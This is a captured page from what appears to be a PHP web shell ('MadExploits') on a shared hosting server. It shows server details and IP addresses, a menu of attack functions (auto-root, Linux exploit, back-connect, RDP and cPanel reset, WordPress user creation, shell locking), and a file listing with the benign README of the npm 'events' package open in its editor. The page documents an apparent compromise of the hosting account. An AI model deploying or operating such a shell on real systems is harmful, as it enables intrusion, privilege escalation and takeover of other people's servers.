Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
events /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
tests
[ DIR ]
dr-xr-xr-x
.airtap.yml
289
B
-rw-r--r--
.travis.yml
671
B
-rw-r--r--
History.md
3.18
KB
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
Readme.md
2.26
KB
-rw-r--r--
events.js
14.54
KB
-rw-r--r--
package.json
859
B
-rw-r--r--
security.md
294
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Readme.md
# events [](https://travis-ci.org/Gozala/events) > Node's event emitter for all engines. This implements the Node.js [`events`][node.js docs] module for environments that do not have it, like browsers. > `events` currently matches the **Node.js 11.13.0** API. Note that the `events` module uses ES5 features. If you need to support very old browsers like IE8, use a shim like [`es5-shim`](https://www.npmjs.com/package/es5-shim). You need both the shim and the sham versions of `es5-shim`. This module is maintained, but only by very few people. If you'd like to help, let us know in the [Maintainer Needed](https://github.com/Gozala/events/issues/43) issue! ## Install You usually do not have to install `events` yourself! If your code runs in Node.js, `events` is built in. If your code runs in the browser, bundlers like [browserify](https://github.com/browserify/browserify) or [webpack](https://github.com/webpack/webpack) also include the `events` module. But if none of those apply, with npm do: ``` npm install events ``` ## Usage ```javascript var EventEmitter = require('events') var ee = new EventEmitter() ee.on('message', function (text) { console.log(text) }) ee.emit('message', 'hello world') ``` ## API See the [Node.js EventEmitter docs][node.js docs]. `events` currently matches the Node.js 11.13.0 API. ## Contributing PRs are very welcome! The main way to contribute to `events` is by porting features, bugfixes and tests from Node.js. Ideally, code contributions to this module are copy-pasted from Node.js and transpiled to ES5, rather than reimplemented from scratch. Matching the Node.js code as closely as possible makes maintenance simpler when new changes land in Node.js. This module intends to provide exactly the same API as Node.js, so features that are not available in the core `events` module will not be accepted. Feature requests should instead be directed at [nodejs/node](https://github.com/nodejs/node) and will be added to this module once they are implemented in Node.js. If there is a difference in behaviour between Node.js's `events` module and this module, please open an issue! ## License [MIT](./LICENSE) [node.js docs]: https://nodejs.org/dist/v11.13.0/docs/api/events.html
Close